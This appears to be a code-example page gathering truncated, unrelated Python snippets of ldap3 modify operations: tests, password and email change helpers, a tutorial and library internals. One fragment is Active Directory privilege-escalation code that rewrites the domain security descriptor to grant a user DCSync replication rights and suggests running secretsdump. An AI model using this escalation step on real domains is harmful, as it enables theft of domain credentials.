Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def test_modify_replace(self):
result = self.connection.modify(self.delete_at_teardown[0][0], {'givenName': (MODIFY_REPLACE, ['givenname-1-replaced']), 'sn': (MODIFY_REPLACE, ['sn-replaced'])})
if not self.connection.strategy.sync:
_, result = self.connection.get_response(result)
else:
result = self.connection.result
self.assertEqual(result['description'], 'success')
def test_modify_replace_existing_singlevalue_3(self):
dn = 'cn=user4,ou=test,o=lab'
self.connection_3.bind()
result = self.connection_3.modify(dn, {'sn': (MODIFY_REPLACE, ['user_test_sn'])})
if not self.connection_3.strategy.sync:
_, result = self.connection_3.get_response(result)
else:
result = self.connection_3.result
self.assertEqual(result['description'], 'success')
self.assertTrue(b'user_test_sn' in self.connection_3.strategy.entries[dn]['sn'])
self.assertEqual(len(self.connection_3.strategy.entries[dn]['sn']), 1)
if str is bytes: # python2, converts to unicode
new_password = to_unicode(new_password)
if old_password:
old_password = to_unicode(old_password)
encoded_new_password = ('"%s"' % new_password).encode('utf-16-le')
if old_password: # normal users must specify old and new password
encoded_old_password = ('"%s"' % old_password).encode('utf-16-le')
result = connection.modify(user_dn,
{'unicodePwd': [(MODIFY_DELETE, [encoded_old_password]),
(MODIFY_ADD, [encoded_new_password])]},
controls)
else: # admin users can reset password without sending the old one
result = connection.modify(user_dn,
{'unicodePwd': [(MODIFY_REPLACE, [encoded_new_password])]},
controls)
if not connection.strategy.sync:
_, result = connection.get_response(result)
else:
result = connection.result
# change successful, returns True
if result['result'] == RESULT_SUCCESS:
return True
# change was not successful, raises exception if raise_exception = True in connection or returns the operation result, error code is in result['result']
if connection.raise_exceptions:
from ...core.exceptions import LDAPOperationResult
if log_enabled(PROTOCOL):
log(PROTOCOL, 'operation result <%s> for <%s>', result, connection)
def change_email(username, password, email):
"""Change a user's email
Uses ldap3.MODIFY_DELETE if email is None.
Uses ldap3.MODIFY_REPLACE in any other case, it should add the
attribute, if it is not yet set up (replace removes all
attributes of the given kind and puts the new one in place)
"""
delete = email is None
mail_change = (ldap3.MODIFY_DELETE, []) if delete else (ldap3.MODIFY_REPLACE, [email])
try:
with LdapConnector(username, password) as l:
l.modify(dn=l.get_dn(), changes={'mail': [mail_change]})
except ldap3.core.exceptions.LDAPNoSuchObjectResult as e:
logger.error('LDAP user not found when attempting '
'change of mail address',
extra={'data': {'exception_args': e.args},
'stack': True})
raise UserNotFound from e
except PasswordInvalid:
logger.info('Wrong password provided when attempting '
'change of mail address')
raise
except ldap3.core.exceptions.LDAPInsufficientAccessRightsResult:
logger.error('Not sufficient rights to change the mail address')
raise LDAPConnectionError
raise ValueError("Cannot connect to LDAP Server. Ensure credentials are correct\n Error: {0}".format(err))
# Inform user
msg = ""
if helper.LDAP_IS_ACTIVE_DIRECTORY:
msg = "Connected to {0}".format("Active Directory")
else:
msg = "Connected to {0}".format("LDAP Server")
yield StatusMessage(msg)
res = False
try:
yield StatusMessage("Attempting to update {0}".format(input_ldap_attribute_name))
# perform the Modify operation
res = c.modify(input_ldap_dn, {input_ldap_attribute_name: [(MODIFY_REPLACE, input_ldap_attribute_values)]})
except Exception:
raise ValueError("Failed to update. Ensure 'ldap_dn' is valid and the update meets your LDAP CONSTRAINTS")
finally:
# Unbind connection
c.unbind()
results = {
"success": res,
"attribute_name": input_ldap_attribute_name,
"attribute_values": input_ldap_attribute_values,
"user_dn": input_ldap_dn
}
log.info("Completed")
def set_attribute(self, dn, attribute, value):
if isinstance(value, (list, tuple)):
value = [str(v) for v in value]
elif isinstance(value, bool):
value = ["TRUE" if value else "FALSE"]
else:
value = [value]
self.conn.modify(dn, {attribute: [(ldap3.MODIFY_REPLACE, value)]})
LOG.info('Querying domain security descriptor')
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = self.client.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
# Save old SD for restore purposes
restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
restoredata['target_sid'] = usersid
secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid))
secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid))
dn = entry.entry_dn
data = secDesc.getData()
self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
if self.client.result['result'] == 0:
alreadyEscalated = True
LOG.critical(
'Success! User %s now has Replication-Get-Changes-All privileges on the domain' % username)
LOG.info('Try using DCSync with secretsdump.py and this user :)')
config.set_priv(True)
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=[
'SAMAccountName', 'nTSecurityDescriptor'], controls=controls)
entry = self.client.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
# Save this to restore the SD later on
restoredata['target_dn'] = dn
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
self.writeRestoreData(restoredata, dn)
return True
# Inform user
msg = ""
if helper.LDAP_IS_ACTIVE_DIRECTORY:
msg = "Connected to {0}".format("Active Directory")
else:
msg = "Connected to {0}".format("LDAP Server")
yield StatusMessage(msg)
res = False
try:
yield StatusMessage("Attempting to change password")
if helper.LDAP_IS_ACTIVE_DIRECTORY:
res = c.extend.microsoft.modify_password(str(input_ldap_dn), input_ldap_new_password)
else:
res = c.modify(input_ldap_dn, {'userPassword': [(MODIFY_REPLACE, [input_ldap_new_password])]})
except Exception:
raise ValueError("Could not change password. Check input_ldap_dn and input_ldap_new_password are valid")
finally:
# Unbind connection
c.unbind()
results = {
"success": res,
"user_dn": input_ldap_dn
}
log.info("Completed")
# Produce a FunctionResult with the results
print(conn.result)
conn.add('ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'organizationalUnit')
print(1, conn.last_error)
conn.add('cn=b.young,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Beatrix', 'sn': 'Young', 'departmentNumber': 'DEV', 'telephoneNumber': 1111})
print(2, conn.last_error)
conn.modify_dn('cn=b.young,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith')
print(3, conn.last_error)
conn.add('ou=moved, ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'organizationalUnit')
print(4, conn.last_error)
conn.modify_dn('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith', new_superior='ou=moved, ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
print(5, conn.last_error)
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_ADD, ['Smyth'])]})
print(6, conn.last_error)
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_DELETE, ['Young'])]})
print(8, conn.last_error)
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_REPLACE, ['Smith'])]})
print(9, conn.last_error)
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_ADD, ['Young', 'Johnson']), (MODIFY_DELETE, ['Smith'])], 'givenname': [(MODIFY_REPLACE, ['Mary', 'Jane'])]})
print(10, conn.last_error)
conn.modify_dn('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith', new_superior='ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
print(11, conn.last_error)
conn.modify('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_DELETE, ['Johnson'])], 'givenname': [(MODIFY_REPLACE, ['Beatrix'])]})
print(12, conn.last_error)
conn.modify_dn('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.young')
print(13, conn.last_error)
conn.add('cn=m.johnson,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Mary Ann', 'sn': 'Johnson', 'departmentNumber': 'DEV', 'telephoneNumber': 2222})
print(14, conn.last_error)
conn.add('cn=q.gray,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Quentin', 'sn': 'Gray', 'departmentNumber': 'QA', 'telephoneNumber': 3333})
print(15, conn.last_error)
obj_person = ObjectDef('inetOrgPerson', conn)
r = Reader(conn, obj_person, 'ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
attribute_name_to_check = attribute_name
if self.server.schema.attribute_types and attribute_name_to_check.lower() not in conf_attributes_excluded_from_check and attribute_name_to_check not in self.server.schema.attribute_types:
raise LDAPAttributeError('invalid attribute type ' + attribute_name_to_check)
change = changes[attribute_name]
if isinstance(change, SEQUENCE_TYPES) and change[0] in [MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE, MODIFY_INCREMENT, 0, 1, 2, 3]:
if len(change) != 2:
self.last_error = 'malformed change'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', self.last_error, self)
raise LDAPChangeError(self.last_error)
changelist[attribute_name] = [change] # insert change in a list
else:
for change_operation in change:
if len(change_operation) != 2 or change_operation[0] not in [MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE, MODIFY_INCREMENT, 0, 1, 2, 3]:
self.last_error = 'invalid change list'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', self.last_error, self)
raise LDAPChangeError(self.last_error)
changelist[attribute_name] = change
request = modify_operation(dn, changelist, self.auto_encode, self.server.schema if self.server else None, validator=self.server.custom_validator if self.server else None, check_names=self.check_names)
if log_enabled(PROTOCOL):
log(PROTOCOL, 'MODIFY request <%s> sent via <%s>', modify_request_to_dict(request), self)
response = self.post_send_single_response(self.send('modifyRequest', request, controls))
self._entries = []
if isinstance(response, STRING_TYPES + (int, )):
return_value = response
if log_enabled(PROTOCOL):
log(PROTOCOL, 'async MODIFY response id <%s> received via <%s>', return_value, self)
else: